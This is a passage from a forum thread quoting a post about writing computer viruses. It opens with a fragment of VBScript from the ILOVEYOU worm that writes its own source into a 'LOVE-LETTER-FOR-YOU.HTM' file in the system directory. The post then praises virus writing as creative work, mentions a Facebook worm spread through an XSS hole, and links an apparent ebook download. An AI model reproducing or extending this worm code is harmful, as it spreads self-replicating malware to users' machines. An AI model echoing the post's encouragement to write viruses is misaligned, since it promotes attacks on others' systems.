lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub [/code] so if you know vbs and you have a fresh idea , you are a good virus writer. Yes. anyway did you guys heard about a virus that inflect the facebook accounts , it's actually a worm . It uses a XSS hole in the facebook to execute the aribratary javascript code and inflect. It inflected to the huge number of facebook accounts. so computer viruses are not only limited to the desktop viruses. Think different and get an new idea is the most important thing as I feel. anyway someone who wish to start explore the computer virology this book is good ... [url]http://www.flazx.com/ebook2723.php[/url] [B]Publisher[/B] Addison-Wesley [B]Author(s)[/B] Peter Szor [B]ISBN[/B] 0321304543 happy reading. [/QUOTE]

Verification

Hath warak paha keeyada? (hatha wadikireema paha)

Search

Latest ads

Reply to thread